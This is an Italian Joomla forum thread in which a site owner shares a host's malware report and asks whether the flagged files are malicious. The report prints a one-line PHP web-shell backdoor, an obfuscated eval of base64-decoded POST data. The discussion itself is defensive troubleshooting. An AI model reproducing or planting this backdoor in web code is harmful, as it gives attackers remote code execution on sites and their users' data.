Joomla.it Forum

Joomla! 2.5 (versione con supporto terminato) => Joomla! 1.6/1.7/2.5 => : aex 29 Sep 2013, 21:42:58

: File sospetti. Report
: aex 29 Sep 2013, 21:42:58

Il sistema dell'hoster evidenzia dei file sospetti. Qualcuno mi sa dire se effettivamente sono anomali e dovrei eliminarli?





FTP and cPanel logs are not showing recent file uploads which indicates an upload through the website's script.
Maldet and clamscan did not find additional malicious files but there are a couple of suspicious files which should be checked.


 


root@tor1 [/home/mysite/public_html/administrator]# ls -lha 7c34.php aIQI.html collector.php eHmobile.php google.php sIQI.html


-rw-r--r-- 1 mysite  79 Aug  8 09:33 7c34.php


-rw-r--r-- 1 mysite 383 Aug 12 03:01 aIQI.html


---------- 1 mysite 29K Sep 27 15:44 collector.php


-rw-r--r-- 1 mysite 12K Jul 30 13:41 eHmobile.php


---------- 1 mysite  79 Jul 22 14:00 google.php


-rw-r--r-- 1 mysite 989 Aug 12 03:01 sIQI.html


 


 


/home/mysite/public_html/administrator/google.php:< ?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}


/home/mysite/public_html/administrator/7c34.php:< ?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}

: Re:File sospetti. Report
: giovi 29 Sep 2013, 23:35:44

questi file non appartengono a Joomla: ti basterebbe aprire un qualunque pacchetto di installazione della tua versione per ragguagliartene. Dovresti chiederti come ci sono arrivati li... Il sito è aggiornato? Estensioni sospette?

: Re:File sospetti. Report
: aex 30 Sep 2013, 08:43:13

Appena ho un pò di tempo, guardo.
come ci sono arrivati? Boh.
Ho ripristinato un backup e devo vedere se ci sono ancora, comunque è qualcuno che si diverte ad entrare, non ho capito bene come e da dove.

: Re:File sospetti. Report
: giovi 30 Sep 2013, 09:19:16

se hai tempo poi puoi provare a decodificare il contenuto e capire cosa contengono quelle pagine php giusto per capire se hanno modificato altro...

: Re:File sospetti. Report
: aex 30 Sep 2013, 12:07:06

L'unica cosa stra è visualizzare Google Analytics direttamente nel pannello home dell'admin.
Non so se questo permette di aprire elle porte. So solo che joomla è aggiornato.


Tra l'altro ho notato che prima di ripristinare il backup (chissà se anche quello compromesso) l'utilizzo dello spazio hosting aumentava di minuto in minuto, l'hoster mi ha bloccato l'account per traffico anomalo e mi sono accorto che qualcuno ha creato degli account email fittizi, con mio dominio inviato 10.000 email (tutte tornate indietro).


Se ritrovo i file posso vedere cosa trovo ma se a causa del ripristino sono spariti, non potrò vedere nulla.

: Re:File sospetti. Report
: aex 30 Sep 2013, 12:50:19

Esiste un componente che su impostazione dell'admin blocca la modifica di un file o di una o più cartelle?